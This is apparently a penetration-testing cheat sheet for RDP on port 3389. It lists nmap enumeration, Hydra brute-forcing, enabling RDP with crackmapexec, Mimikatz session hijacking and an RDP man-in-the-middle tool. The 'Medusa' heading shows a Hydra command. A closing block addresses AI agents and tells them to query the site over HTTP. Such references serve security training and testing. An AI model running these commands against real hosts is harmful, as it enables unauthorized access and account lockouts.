# Port 3389 | RDP

## Enumeration

### Nmap

```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 <IP>
```

## Bruteforce

Brute forcing can easily lock user accounts. If possible enumerate the domain password policy before proceeding.

### Hydra

```bash
hydra -L <User/s.txt> -P <Password/s.txt> rdp://<IP>
```

### Medusa

```bash
hydra -t 4  -l <User> -P <Password/s.txt> rdp://<IP>
```

## Connecting

### Crackmapexec

Requires administrative privileges, enables RDP on the target host.

```bash
crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -M rdp -o ACTION=enable # Enable RDP
```

### rdesktop

```bash
rdesktop -u <Username> <IP>
rdesktop -d <Domain> -u <Username> -p <Password> <IP>
```

### xfreerdp

```bash
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>'
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard

#Maps specified folder on attacking machine to RDP host
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
```

## **Hijacking**

This method is not stealthy and will disconnect a users active terminal service session. However, you will also be able to connect to a disconnected session which could be stealthier.

This method also requires privileges as SYSTEM on the terminal server host.

### **Mimikatz**

```powershell
Invoke-Mimikatz -Command '"ts::sessions"'
```

![](/files/cjsocd31Cav3bdv5MNW5)

Connect to the terminal services session.

```powershell
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'
```

## **Man-in-the-Middle**

[SETH](https://github.com/SySS-Research/Seth) can be used to perform Man-in-the-Middle attacks over RDP.

{% content-ref url="/pages/-MiMLbfyQD9eqo6ri-Kn" %}
[RDP MiTM](/pentest-everything/everything/everything-active-directory/adversary-in-the-middle/rdp-mitm.md)
{% endcontent-ref %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/everything/ports/port-3389-or-rdp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.